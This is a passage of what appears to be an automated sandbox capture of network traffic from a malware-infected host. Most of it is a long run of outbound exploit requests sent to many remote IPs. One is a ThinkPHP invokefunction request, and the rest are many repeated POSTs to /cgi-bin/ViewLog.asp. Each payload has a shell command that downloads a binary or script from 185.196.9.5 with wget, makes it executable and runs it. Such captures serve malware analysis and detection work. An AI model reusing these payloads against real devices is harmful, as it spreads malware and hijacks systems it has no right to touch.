server</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
1168	192.168.2.15	55026	95.189.101.96	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:27.067203045 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:05:27.374931097 CET	383	IN	HTTP/1.1 404 Not Found Server: micro_httpd Cache-Control: no-cache Date: Fri, 13 Feb 1970 07:48:24 GMT Content-Type: text/html Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 3e 3c 48 34 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 34 3e 0a 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a 3c 48 52 3e 0a 3c 41 44 44 52 45 53 53 3e 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 61 63 6d 65 2e 63 6f 6d 2f 73 6f 66 74 77 61 72 65 2f 6d 69 63 72 6f 5f 68 74 74 70 64 2f 22 3e 6d 69 63 72 6f 5f 68 74 74 70 64 3c 2f 41 3e 3c 2f 41 44 44 52 45 53 53 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY BGCOLOR="#cc9999"><H4>404 Not Found</H4>File not found.<HR><ADDRESS><A HREF="http://www.acme.com/software/micro_httpd/">micro_httpd</A></ADDRESS></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
1169	192.168.2.15	57818	94.26.30.123	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:27.603975058 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:28.676708937 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:28.879106045 CET	389	IN	HTTP/1.1 403 Forbidden Content-Type: text/html; charset=utf-8 Content-Length: 106 Set-Cookie: JSESSIONID=deleted; SameSite=Lax; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; HttpOnly Connection: close X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
1170	192.168.2.15	40268	94.120.37.96	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:27.608150959 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:28.772674084 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:30.148761988 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:32.900775909 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:38.532612085 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:49.540447950 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1171	192.168.2.15	36346	94.123.91.28	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:27.613483906 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1172	192.168.2.15	49880	95.86.102.99	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:27.617583036 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1173	192.168.2.15	55110	85.9.97.47	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:27.649152994 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:27.916986942 CET	113	IN	HTTP/1.1 404 Not Found Date: Sun, 25 Feb 2024 18:05:27 GMT Content-Length: 0 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port
1174	192.168.2.15	55036	95.189.101.96	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:27.650934935 CET	391	IN	HTTP/1.1 400 Bad Request Server: micro_httpd Cache-Control: no-cache Date: Fri, 13 Feb 1970 07:48:25 GMT Content-Type: text/html Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 3e 3c 48 34 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 34 3e 0a 4e 6f 20 72 65 71 75 65 73 74 20 66 6f 75 6e 64 2e 0a 3c 48 52 3e 0a 3c 41 44 44 52 45 53 53 3e 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 61 63 6d 65 2e 63 6f 6d 2f 73 6f 66 74 77 61 72 65 2f 6d 69 63 72 6f 5f 68 74 74 70 64 2f 22 3e 6d 69 63 72 6f 5f 68 74 74 70 64 3c 2f 41 3e 3c 2f 41 44 44 52 45 53 53 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY BGCOLOR="#cc9999"><H4>400 Bad Request</H4>No request found.<HR><ADDRESS><A HREF="http://www.acme.com/software/micro_httpd/">micro_httpd</A></ADDRESS></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
1175	192.168.2.15	52258	95.183.53.67	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:27.796653032 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1176	192.168.2.15	42262	62.29.65.156	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:27.835252047 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1177	192.168.2.15	59826	94.131.55.141	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:27.896373987 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:27.997684956 CET	1260	IN	HTTP/1.1 400 Bad Request Server: squid/4.10 Mime-Version: 1.0 Date: Sun, 25 Feb 2024 18:05:27 GMT Content-Type: text/html;charset=utf-8 Content-Length: 3541 X-Squid-Error: ERR_INVALID_URL 0 Vary: Accept-Language Content-Language: en X-Cache: MISS from ubuntu20 X-Cache-Lookup: NONE from ubuntu20:8080 Via: 1.1 ubuntu20 (squid/4.10) Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 39 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 30 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2019 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2020 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. // Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License// Page basics / {font-family: verdana, sans-se

Session ID	Source IP	Source Port	Destination IP	Destination Port
1178	192.168.2.15	49928	85.28.176.41	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:28.050878048 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:28.266907930 CET	140	IN	HTTP/1.1 403 Forbidden Content-Type: text/html;charset=UTF-8 Content-Length: 0 Connection: close Cache-control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port
1179	192.168.2.15	42204	94.182.117.17	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:28.136910915 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1180	192.168.2.15	49658	85.115.238.3	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:28.166179895 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:28.520662069 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1181	192.168.2.15	49936	85.28.176.41	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:28.475071907 CET	140	IN	HTTP/1.1 403 Forbidden Content-Type: text/html;charset=UTF-8 Content-Length: 0 Connection: close Cache-control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port
1182	192.168.2.15	40866	94.121.96.153	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:28.833726883 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1183	192.168.2.15	45196	95.86.104.9	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:28.835483074 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1184	192.168.2.15	54762	94.122.204.246	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:28.838810921 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1185	192.168.2.15	54238	62.29.26.182	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:28.843231916 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1186	192.168.2.15	60194	95.77.99.165	8080

Timestamp	Bytes transferred	Direction	Data
